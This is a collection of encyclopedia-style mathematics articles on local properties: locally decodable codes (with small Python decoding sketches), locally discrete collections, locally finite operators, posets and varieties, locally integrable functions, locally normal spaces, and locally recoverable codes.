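# Codeword of length 2^k: bit j is <x, a_j> mod 2, where a_j is the k-bit
# binary representation of j (most significant bit first).
A = (np.arange(2 ** k)[:, None] >> np.arange(k)[::-1]) & 1
H = (A @ x) % 2

rho = 0.1                               # corrupt a rho < 1/4 fraction of bits
H_corrupted = (H + (rng.random(2 ** k) < rho)) % 2

def to_pos(v):
    return int("".join(map(str, v)), 2)

def decode_bit(i):
    """One run of the 2-query decoder: output f(y) XOR f(y XOR e_i)."""
    y = rng.integers(0, 2, size=k)
    y2 = y.copy()
    y2[i] ^= 1
    return (H_corrupted[to_pos(y)] + H_corrupted[to_pos(y2)]) % 2

# Each run is correct with probability >= 1 - 2*rho; a majority vote over
# independent runs amplifies this.
i = 3
votes = [decode_bit(i) for _ in range(101)]
print(int(np.median(votes)) == x[i])    # True with high probability
```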
The main idea behind local decoding of Reed-Muller codes is polynomial interpolation . The key concept behind a Reed-Muller code is a multivariate polynomial of degree d {\displaystyle d} on l {\displaystyle l} variables. The message is treated as the evaluation of a polynomial at a set of predefined points. To encode these values, a polynomial is extrapolated from them, and the codeword is the evaluation of that polynomial on all possible points. At a high level, to decode a point of this polynomial, the decoding algorithm chooses a set S {\displaystyle S} of points on a line that passes through the point of interest x {\displaystyle x} . It then queries the codeword for the evaluation of the polynomial on points in S {\displaystyle S} and interpolates that polynomial. Then it is simple to evaluate the interpolated polynomial at the point corresponding to x {\displaystyle x} , which yields the desired value. This roundabout way of evaluating x {\displaystyle x} is useful because (a) the algorithm can be repeated using different lines through the same point to improve the probability of correctness, and (b) the queries are uniformly distributed over the codeword.
More formally, let F {\displaystyle \mathbb {F} } be a finite field , and let l , d {\displaystyle l,d} be numbers with d < | F | {\displaystyle d<|\mathbb {F} |} . The Reed-Muller code with parameters F , l , d {\displaystyle \mathbb {F} ,l,d} is the function RM : F ( l + d d ) → F | F | l {\displaystyle \mathbb {F} ^{\binom {l+d}{d}}\rightarrow \mathbb {F} ^{|\mathbb {F} |^{l}}} that maps every l {\displaystyle l} -variable polynomial P {\displaystyle P} over F {\displaystyle \mathbb {F} } of total degree d {\displaystyle d} to the values of P {\displaystyle P} on all the inputs in F l {\displaystyle \mathbb {F} ^{l}} . That is, the input is a polynomial of the form P ( x 1 , … , x l ) = ∑ i 1 + … + i l ≤ d c i 1 , … , i l x 1 i 1 x 2 i 2 ⋯ x l i l {\displaystyle P(x_{1},\ldots ,x_{l})=\sum \limits _{i_{1}+\ldots +i_{l}\leq d}c_{i_{1},\ldots ,i_{l}}x_{1}^{i_{1}}x_{2}^{i_{2}}\cdots x_{l}^{i_{l}}} specified by the interpolation of the ( l + d d ) {\displaystyle {\binom {l+d}{d}}} values of the predefined points and the output is the sequence { P ( x 1 , … , x l ) } {\displaystyle \{P(x_{1},\ldots ,x_{l})\}} for every x 1 , … , x l ∈ F {\displaystyle x_{1},\ldots ,x_{l}\in \mathbb {F} } . [ 14 ]
To recover the value of a degree d {\displaystyle d} polynomial at a point w ∈ F l {\displaystyle w\in \mathbb {F} ^{l}} , the local decoder shoots a random affine line through w {\displaystyle w} . Then it picks d + 1 {\displaystyle d+1} points on that line, which it uses to interpolate the polynomial, and then evaluates it at the parameter value corresponding to w {\displaystyle w} . To do so, the algorithm picks a vector v ∈ F l {\displaystyle v\in \mathbb {F} ^{l}} uniformly at random and considers the line L = { w + λ v ∣ λ ∈ F } {\displaystyle L=\{w+\lambda v\mid \lambda \in \mathbb {F} \}} through w {\displaystyle w} . The algorithm picks an arbitrary subset S {\displaystyle S} of F {\displaystyle \mathbb {F} } , where | S | = d + 1 {\displaystyle |S|=d+1} , and queries coordinates of the codeword that correspond to points w + λ v {\displaystyle w+\lambda v} for all λ ∈ S {\displaystyle \lambda \in S} and obtains values { e λ } {\displaystyle \{e_{\lambda }\}} . Then it uses polynomial interpolation to recover the unique univariate polynomial h {\displaystyle h} with degree less than or equal to d {\displaystyle d} such that h ( λ ) = e λ {\displaystyle h(\lambda )=e_{\lambda }} for all λ ∈ S {\displaystyle \lambda \in S} . Then, to get the value at w {\displaystyle w} , it just evaluates h ( 0 ) {\displaystyle h(0)} . To recover a single value of the original message, one chooses w {\displaystyle w} to be one of the points that defines the polynomial. [ 8 ] [ 14 ]
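A small runnable sketch of this decoder for a bivariate polynomial over a toy prime field (p = 17, d = 2 and the corruption pattern are illustrative assumptions; for simplicity the random direction v is drawn with a nonzero first coordinate rather than uniformly from all nonzero vectors):

```python
import numpy as np

p, d = 17, 2
rng = np.random.default_rng(2)

# A random bivariate polynomial P of total degree <= d, as a coefficient dict.
coeffs = {(i, j): int(rng.integers(0, p))
          for i in range(d + 1) for j in range(d + 1 - i)}

def P(x, y):
    return sum(c * pow(x, i, p) * pow(y, j, p)
               for (i, j), c in coeffs.items()) % p

codeword = {(x, y): P(x, y) for x in range(p) for y in range(p)}

for _ in range(10):  # corrupt a few positions of the codeword
    pos = (int(rng.integers(0, p)), int(rng.integers(0, p)))
    codeword[pos] = (codeword[pos] + 1) % p

def local_decode(w):
    wx, wy = w
    vx, vy = int(rng.integers(1, p)), int(rng.integers(0, p))  # direction v
    S = range(1, d + 2)  # d + 1 nonzero parameter values on the line
    # Query the codeword along the line w + lambda * v, then Lagrange-
    # interpolate the univariate restriction h and return h(0) = P(w).
    e = {lam: codeword[((wx + lam * vx) % p, (wy + lam * vy) % p)] for lam in S}
    total = 0
    for lam in S:
        num, den = 1, 1
        for mu in S:
            if mu != lam:
                num = num * (-mu) % p
                den = den * (lam - mu) % p
        total = (total + e[lam] * num * pow(den, -1, p)) % p
    return total

w = (4, 11)
print(local_decode(w), P(*w))  # equal unless a corrupted point was queried
```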
Each individual query is distributed uniformly at random over the codeword. Thus, if the codeword is corrupted in at most a δ {\displaystyle \delta } fraction of locations, by the union bound, the probability that the algorithm samples only uncorrupted coordinates (and thus correctly recovers the bit) is at least 1 − ( d + 1 ) δ {\displaystyle 1-(d+1)\delta } . [ 8 ] For other decoding algorithms, see [ 8 ] . | https://en.wikipedia.org/wiki/Locally_decodable_code
In mathematics , particularly topology , collections of subsets are said to be locally discrete if they look like they have precisely one element from a local point of view. The study of locally discrete collections is worthwhile as Bing's metrization theorem shows.
Let X be a topological space . A collection {G a } of subsets of X is said to be locally discrete, if each point of the space has a neighbourhood intersecting at most one element of the collection. A collection of subsets of X is said to be countably locally discrete, if it is the countable union of locally discrete collections.
1. Locally discrete collections are always locally finite . See the page on local finiteness.
2. If a collection of subsets of a topological space X is locally discrete, it must satisfy the property that each point of the space belongs to at most one element of the collection. This means that only collections of pairwise disjoint sets can be locally discrete.
3. A Hausdorff space cannot have a locally discrete basis unless it is itself discrete. The same property holds for a T 1 space .
4. The following is known as Bing's metrization theorem:
A space X is metrizable iff it is regular and has a basis that is countably locally discrete.
5. A countable collection of sets is necessarily countably locally discrete. Therefore, if X is a metrizable space with a countable basis , one implication of Bing's metrization theorem holds. In fact, Bing's metrization theorem is almost a corollary of the Nagata-Smirnov theorem . | https://en.wikipedia.org/wiki/Locally_discrete_collection |
In mathematics , a linear operator f : V → V {\displaystyle f:V\to V} is called locally finite if the space V {\displaystyle V} is the union of a family of finite-dimensional f {\displaystyle f} - invariant subspaces . [ 1 ] [ 2 ] : 40
In other words, there exists a family { V i | i ∈ I } {\displaystyle \{V_{i}\vert i\in I\}} of linear subspaces of V {\displaystyle V} , such that we have the following:
An equivalent condition only requires V {\displaystyle V} to be spanned by finite-dimensional f {\displaystyle f} -invariant subspaces. [ 3 ] [ 4 ] If V {\displaystyle V} is also a Hilbert space , sometimes an operator is called locally finite when the sum of the { V i | i ∈ I } {\displaystyle \{V_{i}\vert i\in I\}} is only dense in V {\displaystyle V} . [ 2 ] : 78–79
| https://en.wikipedia.org/wiki/Locally_finite_operator
In mathematics, a locally finite poset is a partially ordered set P such that for all x , y ∈ P , the interval [ x , y ] consists of finitely many elements.
Given a locally finite poset P we can define its incidence algebra . Elements of the incidence algebra are functions ƒ that assign to each interval [ x , y ] of P a real number ƒ ( x , y ). These functions form an associative algebra with a product defined by ( f ∗ g ) ( x , y ) = ∑ x ≤ z ≤ y f ( x , z ) g ( z , y ) . {\displaystyle (f*g)(x,y)=\sum _{x\leq z\leq y}f(x,z)\,g(z,y).}
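A short sketch of this convolution on a concrete locally finite poset (the divisors of 12 under divisibility; the zeta and delta functions below are standard elements of the incidence algebra, used here purely as an illustration):

```python
from itertools import product

P = [1, 2, 3, 4, 6, 12]                 # divisors of 12, ordered by x | y
leq = lambda x, y: y % x == 0
intervals = [(x, y) for x, y in product(P, P) if leq(x, y)]

def convolve(f, g):
    """(f * g)(x, y) = sum over z with x <= z <= y of f(x, z) * g(z, y)."""
    return {(x, y): sum(f[(x, z)] * g[(z, y)]
                        for z in P if leq(x, z) and leq(z, y))
            for (x, y) in intervals}

zeta = {iv: 1 for iv in intervals}               # constant-1 function
delta = {(x, y): int(x == y) for (x, y) in intervals}

print(convolve(zeta, zeta)[(1, 12)])    # 6: counts the elements of [1, 12]
print(convolve(delta, zeta) == zeta)    # True: delta is the identity
```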
There is also a definition of incidence coalgebra .
In theoretical physics a locally finite poset is also called a causal set and has been used as a model for spacetime .
| https://en.wikipedia.org/wiki/Locally_finite_poset
In universal algebra , a variety of algebras means the class of all algebraic structures of a given signature satisfying a given set of identities. One calls a variety locally finite if every finitely generated algebra has finite cardinality , or equivalently, if every finitely generated free algebra has finite cardinality.
The variety of Boolean algebras constitutes a famous example. The free Boolean algebra on n generators has cardinality 2 2 n {\displaystyle 2^{2^{n}}} , consisting of the n -ary operations 2 n → 2 {\displaystyle 2^{n}\to 2} .
The variety of sets constitutes a degenerate example: the free set on n generators has cardinality n , consisting of just the generators themselves.
The variety of pointed sets constitutes a trivial example: the free pointed set on n generators has cardinality n +1, consisting of the generators along with the basepoint.
The variety of graphs defined as follows constitutes a combinatorial example. Define a graph G = ( E , s , t ) to be a set E of edges and unary operations s , t of source and target satisfying s ( s ( e )) = t ( s ( e )) = s ( e ) and s ( t ( e )) = t ( t ( e )) = t ( e ). Vertices are those edges in the (common) image of s and t . The free graph on n generators has cardinality 3 n and consists of n edges e each with two endpoints s ( e ) and t ( e ). Graphs with nontrivial incidence relations arise as quotients of free graphs, most usefully by identifying vertices.
The variety of sets and the variety of graphs so defined each forms a presheaf category and hence a topos . This is not the case for the variety of Boolean algebras or of pointed sets.
| https://en.wikipedia.org/wiki/Locally_finite_variety |
In mathematics , a locally integrable function (sometimes also called locally summable function ) [ 1 ] is a function which is integrable (so its integral is finite) on every compact subset of its domain of definition . The importance of such functions lies in the fact that their function space is similar to L p spaces , but its members are not required to satisfy any growth restriction on their behavior at the boundary of their domain (at infinity if the domain is unbounded): in other words, locally integrable functions can grow arbitrarily fast at the domain boundary, but are still manageable in a way similar to ordinary integrable functions.
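A standard example (sketched here as an illustration, not taken from the cited references) shows how fast growth at the boundary is compatible with local integrability: the exponential function is locally integrable on the whole real line, yet it lies in no global L p space.

```latex
% f(x) = e^x is in L_{1,loc}(R) but in no L_p(R):
\[
  \int_{K} e^{x}\,dx \le \int_{-R}^{R} e^{x}\,dx = e^{R} - e^{-R} < \infty
  \qquad \text{for every compact } K \subseteq [-R, R],
\]
\[
  \text{yet } \int_{\mathbb{R}} e^{p x}\,dx = \infty
  \ \text{for all } 1 \le p < \infty,
  \ \text{and } e^{x} \notin L^{\infty}(\mathbb{R})
  \ \text{since it is unbounded.}
\]
```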
Definition 1 . [ 2 ] Let Ω be an open set in the Euclidean space R n {\displaystyle \mathbb {R} ^{n}} and f : Ω → C {\displaystyle \mathbb {C} } be a Lebesgue measurable function . If f on Ω is such that ∫ K | f | d x < + ∞ {\displaystyle \textstyle \int _{K}|f|\,\mathrm {d} x<+\infty } ,
i.e. its Lebesgue integral is finite on all compact subsets K of Ω , [ 3 ] then f is called locally integrable . The set of all such functions is denoted by L 1,loc (Ω) : L 1 , l o c ( Ω ) = { f : Ω → C  measurable ∣ f | K ∈ L 1 ( K )  for all compact  K ⊂ Ω } {\displaystyle L_{1,loc}(\Omega )=\{f:\Omega \to \mathbb {C} {\text{ measurable}}\mid \left.f\right|_{K}\in L_{1}(K){\text{ for all compact }}K\subset \Omega \}} ,
where f | K {\textstyle \left.f\right|_{K}} denotes the restriction of f to the set K .
The classical definition of a locally integrable function involves only measure theoretic and topological [ 4 ] concepts and can be carried over, in abstract form, to complex-valued functions on a topological measure space ( X , Σ, μ ) : [ 5 ] however, since the most common application of such functions is to distribution theory on Euclidean spaces, [ 2 ] all the definitions in this and the following sections deal explicitly only with this important case.
Definition 2 . [ 6 ] Let Ω be an open set in the Euclidean space R n {\displaystyle \mathbb {R} ^{n}} . Then a function f : Ω → C {\displaystyle \mathbb {C} } such that ∫ Ω | f φ | d x < + ∞ {\displaystyle \textstyle \int _{\Omega }|f\varphi |\,\mathrm {d} x<+\infty }
for each test function φ ∈ C ∞ c (Ω) is called locally integrable , and the set of such functions is denoted by L 1,loc (Ω) . Here C ∞ c (Ω) denotes the set of all infinitely differentiable functions φ : Ω → R {\displaystyle \mathbb {R} } with compact support contained in Ω .
This definition has its roots in the approach to measure and integration theory based on the concept of continuous linear functional on a topological vector space , developed by the Nicolas Bourbaki school: [ 7 ] it is also the one adopted by Strichartz (2003) and by Maz'ya & Shaposhnikova (2009 , p. 34). [ 8 ] This "distribution theoretic" definition is equivalent to the standard one, as the following lemma proves:
Lemma 1 . A given function f : Ω → C {\displaystyle \mathbb {C} } is locally integrable according to Definition 1 if and only if it is locally integrable according to Definition 2 .
If part : Let φ ∈ C ∞ c (Ω) be a test function. It is bounded by its supremum norm || φ || ∞ , measurable, and has a compact support , let's call it K . Hence ∫ Ω | f φ | d x ≤ ‖ φ ‖ ∞ ∫ K | f | d x < + ∞ {\displaystyle \textstyle \int _{\Omega }|f\varphi |\,\mathrm {d} x\leq \|\varphi \|_{\infty }\int _{K}|f|\,\mathrm {d} x<+\infty }
by Definition 1 .
Only if part : Let K be a compact subset of the open set Ω . We will first construct a test function φ K ∈ C ∞ c (Ω) which majorises the indicator function χ K of K .
The usual set distance [ 9 ] between K and the boundary ∂Ω is strictly greater than zero, i.e. Δ := d ( K , ∂ Ω ) > 0 {\displaystyle \Delta :=d(K,\partial \Omega )>0} ,
hence it is possible to choose a real number δ such that Δ > 2 δ > 0 (if ∂Ω is the empty set, take Δ = ∞ ). Let K δ and K 2 δ denote the closed δ -neighborhood and 2 δ -neighborhood of K , respectively. They are likewise compact and satisfy K ⊂ K δ ⊂ K 2 δ ⊂ Ω {\displaystyle K\subset K_{\delta }\subset K_{2\delta }\subset \Omega } .
Now use convolution to define the function φ K : Ω → R {\displaystyle \mathbb {R} } by φ K ( x ) = ( χ K δ ∗ φ δ ) ( x ) = ∫ R n χ K δ ( y ) φ δ ( x − y ) d y {\displaystyle \varphi _{K}(x)=(\chi _{K_{\delta }}\ast \varphi _{\delta })(x)=\int _{\mathbb {R} ^{n}}\chi _{K_{\delta }}(y)\,\varphi _{\delta }(x-y)\,\mathrm {d} y} ,
where φ δ is a mollifier constructed by using the standard positive symmetric one . Obviously φ K is non-negative in the sense that φ K ≥ 0 , infinitely differentiable, and its support is contained in K 2 δ , in particular it is a test function. Since φ K ( x ) = 1 for all x ∈ K , we have that χ K ≤ φ K .
Let f be a locally integrable function according to Definition 2 . Then ∫ K | f | d x = ∫ Ω | f | χ K d x ≤ ∫ Ω | f | φ K d x < + ∞ {\displaystyle \textstyle \int _{K}|f|\,\mathrm {d} x=\int _{\Omega }|f|\chi _{K}\,\mathrm {d} x\leq \int _{\Omega }|f|\varphi _{K}\,\mathrm {d} x<+\infty } .
Since this holds for every compact subset K of Ω , the function f is locally integrable according to Definition 1 . □
Definition 3 . [ 10 ] Let Ω be an open set in the Euclidean space R n {\displaystyle \mathbb {R} ^{n}} and f : Ω → C {\displaystyle \mathbb {C} } be a Lebesgue measurable function. If, for a given p with 1 ≤ p ≤ +∞ , f satisfies ∫ K | f | p d x < + ∞ {\displaystyle \textstyle \int _{K}|f|^{p}\,\mathrm {d} x<+\infty } (with the usual modification ess sup K | f | < + ∞ when p = +∞ ),
i.e., it belongs to L p ( K ) for all compact subsets K of Ω , then f is called locally p - integrable or also p - locally integrable . [ 10 ] The set of all such functions is denoted by L p ,loc (Ω) : L p , l o c ( Ω ) = { f : Ω → C  measurable ∣ f | K ∈ L p ( K )  for all compact  K ⊂ Ω } {\displaystyle L_{p,loc}(\Omega )=\{f:\Omega \to \mathbb {C} {\text{ measurable}}\mid \left.f\right|_{K}\in L_{p}(K){\text{ for all compact }}K\subset \Omega \}} .
An alternative definition, completely analogous to the one given for locally integrable functions, can also be given for locally p -integrable functions: it can then be proven equivalent to the one in this section. [ 11 ] Despite their apparent higher generality, locally p -integrable functions form a subset of locally integrable functions for every p such that 1 < p ≤ +∞ . [ 12 ]
Apart from the different glyphs which may be used for the uppercase "L", [ 13 ] there are few variants for the notation of the set of locally integrable functions.
Theorem 1 . [ 14 ] L p ,loc is a complete metrizable space : its topology can be generated by the following metric : d ( u , v ) = ∑ k ≥ 1 1 2 k ‖ u − v ‖ p , ω k 1 + ‖ u − v ‖ p , ω k {\displaystyle d(u,v)=\sum _{k\geq 1}{\frac {1}{2^{k}}}\,{\frac {\|u-v\|_{p,\omega _{k}}}{1+\|u-v\|_{p,\omega _{k}}}}} where { ω k } k ≥1 is a family of non-empty open sets such that ω k ⋐ ω k + 1 {\displaystyle \omega _{k}\Subset \omega _{k+1}} (i.e. ω k is compactly included in ω k +1 ), ⋃ k ω k = Ω {\displaystyle \textstyle \bigcup _{k}\omega _{k}=\Omega } , and ‖ ⋅ ‖ p , ω k {\displaystyle \|\cdot \|_{p,\omega _{k}}} denotes the norm of L p ( ω k ) .
In references ( Gilbarg & Trudinger 2001 , p. 147), ( Maz'ya & Poborchi 1997 , p. 5), ( Maz'ja 1985 , p. 6) and ( Maz'ya 2011 , p. 2), this theorem is stated but not proved on a formal basis: [ 15 ] a complete proof of a more general result, which includes it, is found in ( Meise & Vogt 1997 , p. 40).
Theorem 2 . Every function f belonging to L p (Ω) , 1 ≤ p ≤ +∞ , where Ω is an open subset of R n {\displaystyle \mathbb {R} ^{n}} , is locally integrable.
Proof . The case p = 1 is trivial, therefore in the sequel of the proof it is assumed that 1 < p ≤ +∞ . Consider the characteristic function χ K of a compact subset K of Ω : then, for p ≤ +∞ , ‖ χ K ‖ q = μ ( K ) 1 / q < + ∞ {\displaystyle \|\chi _{K}\|_{q}=\mu (K)^{1/q}<+\infty } , where q is the conjugate exponent of p , i.e. 1 / p + 1 / q = 1 {\displaystyle 1/p+1/q=1} , and μ ( K ) is the Lebesgue measure of K .
Then for any f belonging to L p (Ω) , by Hölder's inequality , the product fχ K is integrable i.e. belongs to L 1 (Ω) and ‖ f χ K ‖ 1 ≤ ‖ f ‖ p ‖ χ K ‖ q = ‖ f ‖ p μ ( K ) 1 / q {\displaystyle \|f\chi _{K}\|_{1}\leq \|f\|_{p}\,\|\chi _{K}\|_{q}=\|f\|_{p}\,\mu (K)^{1/q}} , therefore ∫ K | f | d x ≤ ‖ f ‖ p μ ( K ) 1 / q < + ∞ {\displaystyle \textstyle \int _{K}|f|\,\mathrm {d} x\leq \|f\|_{p}\,\mu (K)^{1/q}<+\infty } .
Note that since the following inequality is true ∫ K | f | d x ≤ ‖ f ‖ L p ( K ) μ ( K ) 1 / q {\displaystyle \textstyle \int _{K}|f|\,\mathrm {d} x\leq \|f\|_{L_{p}(K)}\,\mu (K)^{1/q}} ,
the theorem is true also for functions f belonging only to the space of locally p -integrable functions, therefore the theorem implies also the following result.
Corollary 1 . Every function f {\displaystyle f} in L p , l o c ( Ω ) {\displaystyle L_{p,loc}(\Omega )} , 1 < p ≤ ∞ {\displaystyle 1<p\leq \infty } , is locally integrable, i. e. belongs to L 1 , l o c ( Ω ) {\displaystyle L_{1,loc}(\Omega )} .
Note: If Ω {\displaystyle \Omega } is an open subset of R n {\displaystyle \mathbb {R} ^{n}} that is also bounded, then one has the standard inclusion L p ( Ω ) ⊂ L 1 ( Ω ) {\displaystyle L_{p}(\Omega )\subset L_{1}(\Omega )} which makes sense given the above inclusion L 1 ( Ω ) ⊂ L 1 , l o c ( Ω ) {\displaystyle L_{1}(\Omega )\subset L_{1,loc}(\Omega )} . But the first of these statements is not true if Ω {\displaystyle \Omega } is not bounded; then it is still true that L p ( Ω ) ⊂ L 1 , l o c ( Ω ) {\displaystyle L_{p}(\Omega )\subset L_{1,loc}(\Omega )} for any p {\displaystyle p} , but not that L p ( Ω ) ⊂ L 1 ( Ω ) {\displaystyle L_{p}(\Omega )\subset L_{1}(\Omega )} . To see this, one typically considers the function u ( x ) = 1 {\displaystyle u(x)=1} , which is in L ∞ ( R n ) {\displaystyle L_{\infty }(\mathbb {R} ^{n})} but not in L p ( R n ) {\displaystyle L_{p}(\mathbb {R} ^{n})} for any finite p {\displaystyle p} .
Theorem 3 . A function f is the density of an absolutely continuous measure if and only if f ∈ L 1 , l o c {\displaystyle f\in L_{1,loc}} .
The proof of this result is sketched by ( Schwartz 1998 , p. 18). Rephrasing its statement, this theorem asserts that every locally integrable function defines an absolutely continuous measure and conversely that every absolutely continuous measure defines a locally integrable function: this is also, in the abstract measure theory framework, the form of the important Radon–Nikodym theorem given by Stanisław Saks in his treatise. [ 16 ]
Locally integrable functions play a prominent role in distribution theory and they occur in the definition of various classes of functions and function spaces , like functions of bounded variation . Moreover, they appear in the Radon–Nikodym theorem by characterizing the absolutely continuous part of every measure.
This article incorporates material from Locally integrable function on PlanetMath , which is licensed under the Creative Commons Attribution/Share-Alike License . | https://en.wikipedia.org/wiki/Locally_integrable_function |
In mathematics , particularly topology , a topological space X is locally normal if intuitively it looks locally like a normal space . [ 1 ] More precisely, a locally normal space satisfies the property that each point of the space belongs to a neighbourhood of the space that is normal under the subspace topology .
A topological space X is said to be locally normal if and only if each point, x , of X has a neighbourhood that is normal under the subspace topology . [ 2 ]
Note that not every neighbourhood of x has to be normal, but at least one neighbourhood of x has to be normal (under the subspace topology).
Note however, that if a space were called locally normal if and only if each point of the space belonged to a subset of the space that was normal under the subspace topology, then every topological space would be locally normal. This is because the singleton { x } is vacuously normal and contains x . Therefore, the definition is more restrictive.
Čech, Eduard (1937). "On Bicompact Spaces" . Annals of Mathematics . 38 (4): 823– 844. doi : 10.2307/1968839 . ISSN 0003-486X . JSTOR 1968839 .
| https://en.wikipedia.org/wiki/Locally_normal_space |
Locally recoverable codes are a family of error correction codes that were introduced first by D. S. Papailiopoulos and A. G. Dimakis [ 1 ] and have been widely studied in information theory due to their applications related to distributed and cloud storage systems. [ 2 ] [ 3 ] [ 4 ] [ 5 ]
An [ n , k , d , r ] q {\displaystyle [n,k,d,r]_{q}} LRC is an [ n , k , d ] q {\displaystyle [n,k,d]_{q}} linear code such that there is a function f i {\displaystyle f_{i}} that takes as input i {\displaystyle i} and a set of r {\displaystyle r} other coordinates of a codeword c = ( c 1 , … , c n ) ∈ C {\displaystyle c=(c_{1},\ldots ,c_{n})\in C} different from c i {\displaystyle c_{i}} , and outputs c i {\displaystyle c_{i}} .
Erasure-correcting codes , or simply erasure codes , for distributed and cloud storage systems, are becoming more and more popular as a result of the present spike in demand for cloud computing and storage services. This has inspired researchers in the fields of information and coding theory to investigate new facets of codes that are specifically suited for use with storage systems.
It is well-known that LRC is a code that needs only a limited set of other symbols to be accessed in order to restore every symbol in a codeword. This idea is very important for distributed and cloud storage systems since the most common error case is when one storage node fails (erasure). The main objective is to recover as much data as possible from the fewest additional storage nodes in order to restore the node. Hence, Locally Recoverable Codes are crucial for such systems.
The following definition of the LRC follows from the description above: an [ n , k , r ] {\displaystyle [n,k,r]} -Locally Recoverable Code (LRC) of length n {\displaystyle n} is a code that produces an n {\displaystyle n} -symbol codeword from k {\displaystyle k} information symbols, and for any symbol of the codeword, there exist at most r {\displaystyle r} other symbols such that the value of the symbol can be recovered from them. The locality parameter satisfies 1 ≤ r ≤ k {\displaystyle 1\leq r\leq k} because the entire codeword can be found by accessing k {\displaystyle k} symbols other than the erased symbol. Furthermore, Locally Recoverable Codes, having the minimum distance d {\displaystyle d} , can recover d − 1 {\displaystyle d-1} erasures.
Let C {\displaystyle C} be a [ n , k , d ] q {\displaystyle [n,k,d]_{q}} linear code . For i ∈ { 1 , … , n } {\displaystyle i\in \{1,\ldots ,n\}} , let us denote by r i {\displaystyle r_{i}} the minimum number of other coordinates we have to look at to recover an erasure in coordinate i {\displaystyle i} . The number r i {\displaystyle r_{i}} is said to be the locality of the i {\displaystyle i} -th coordinate of the code. The locality of the code is defined as r = max 1 ≤ i ≤ n r i {\displaystyle r=\max _{1\leq i\leq n}r_{i}} .
An [ n , k , d , r ] q {\displaystyle [n,k,d,r]_{q}} locally recoverable code (LRC) is an [ n , k , d ] q {\displaystyle [n,k,d]_{q}} linear code C ⊆ F q n {\displaystyle C\subseteq \mathbb {F} _{q}^{n}} with locality r {\displaystyle r} .
Let C {\displaystyle C} be an [ n , k , d ] q {\displaystyle [n,k,d]_{q}} -locally recoverable code. Then an erased component can be recovered linearly, [ 6 ] i.e. for every i ∈ { 1 , … , n } {\displaystyle i\in \{1,\ldots ,n\}} , the space of linear equations of the code contains elements of the form x i = f ( x i 1 , … , x i r ) {\displaystyle x_{i}=f(x_{i_{1}},\ldots ,x_{i_{r}})} , where i j ≠ i {\displaystyle i_{j}\neq i} .
Theorem [ 7 ] Let n = ( r + 1 ) s {\displaystyle n=(r+1)s} and let C {\displaystyle C} be an [ n , k , d ] q {\displaystyle [n,k,d]_{q}} -locally recoverable code having s {\displaystyle s} disjoint locality sets of size r + 1 {\displaystyle r+1} . Then
An [ n , k , d , r ] q {\displaystyle [n,k,d,r]_{q}} -LRC C {\displaystyle C} is said to be optimal if the minimum distance of C {\displaystyle C} satisfies d = n − k − ⌈ k r ⌉ + 2 {\displaystyle d=n-k-\left\lceil {\frac {k}{r}}\right\rceil +2} .
Let f ∈ F q [ x ] {\displaystyle f\in \mathbb {F} _{q}[x]} be a polynomial and let ℓ {\displaystyle \ell } be a positive integer . Then f {\displaystyle f} is said to be ( r {\displaystyle r} , ℓ {\displaystyle \ell } )-good if f {\displaystyle f} has degree r + 1 {\displaystyle r+1} and there exist pairwise disjoint subsets A 1 , … , A ℓ {\displaystyle A_{1},\ldots ,A_{\ell }} of F q {\displaystyle \mathbb {F} _{q}} , each of size r + 1 {\displaystyle r+1} , such that f {\displaystyle f} is constant on each A i {\displaystyle A_{i}} .
We say that { A 1 , … , A ℓ {\displaystyle A_{1},\ldots ,A_{\ell }} } is a splitting covering for f {\displaystyle f} . [ 8 ]
The Tamo–Barg construction utilizes good polynomials. [ 9 ]
We will use x 5 ∈ F 41 [ x ] {\displaystyle x^{5}\in \mathbb {F} _{41}[x]} to construct [ 15 , 8 , 6 , 4 ] {\displaystyle [15,8,6,4]} -LRC. Notice that the degree of this polynomial is 5, and it is constant on A i {\displaystyle A_{i}} for i ∈ { 1 , … , 8 } {\displaystyle i\in \{1,\ldots ,8\}} , where A 1 = { 1 , 10 , 16 , 18 , 37 } {\displaystyle A_{1}=\{1,10,16,18,37\}} , A 2 = 2 A 1 {\displaystyle A_{2}=2A_{1}} , A 3 = 3 A 1 {\displaystyle A_{3}=3A_{1}} , A 4 = 4 A 1 {\displaystyle A_{4}=4A_{1}} , A 5 = 5 A 1 {\displaystyle A_{5}=5A_{1}} , A 6 = 6 A 1 {\displaystyle A_{6}=6A_{1}} , A 7 = 11 A 1 {\displaystyle A_{7}=11A_{1}} , and A 8 = 15 A 1 {\displaystyle A_{8}=15A_{1}} : A 1 5 = { 1 } {\displaystyle A_{1}^{5}=\{1\}} , A 2 5 = { 32 } {\displaystyle A_{2}^{5}=\{32\}} , A 3 5 = { 38 } {\displaystyle A_{3}^{5}=\{38\}} , A 4 5 = { 40 } {\displaystyle A_{4}^{5}=\{40\}} , A 5 5 = { 9 } {\displaystyle A_{5}^{5}=\{9\}} , A 6 5 = { 27 } {\displaystyle A_{6}^{5}=\{27\}} , A 7 5 = { 3 } {\displaystyle A_{7}^{5}=\{3\}} , A 8 5 = { 14 } {\displaystyle A_{8}^{5}=\{14\}} . Hence, x 5 {\displaystyle x^{5}} is a ( 4 , 8 ) {\displaystyle (4,8)} -good polynomial over F 41 {\displaystyle \mathbb {F} _{41}} by the definition. Now, we will use this polynomial to construct a code of dimension k = 8 {\displaystyle k=8} and length n = 15 {\displaystyle n=15} over F 41 {\displaystyle \mathbb {F} _{41}} . The locality of this code is 4, which will allow us to recover a single server failure by looking at the information contained in at most 4 other servers .
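The defining property of the good polynomial can be checked mechanically. The following sketch (the variable names and structure are illustrative assumptions, not from the cited construction) verifies that x^5 is constant on each of the eight sets above:

```python
# Check that f(x) = x^5 is (4, 8)-good over F_41: it takes a single
# value on each of the eight disjoint 5-element sets A_1, ..., A_8.
q = 41
A1 = [1, 10, 16, 18, 37]
multipliers = [1, 2, 3, 4, 5, 6, 11, 15]   # A_i = multiplier * A_1

for m in multipliers:
    Am = [(m * a) % q for a in A1]
    images = {pow(a, 5, q) for a in Am}
    assert len(images) == 1, "x^5 should be constant on each set"
    print(f"{m}*A1 -> x^5 = {images.pop()}")
```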
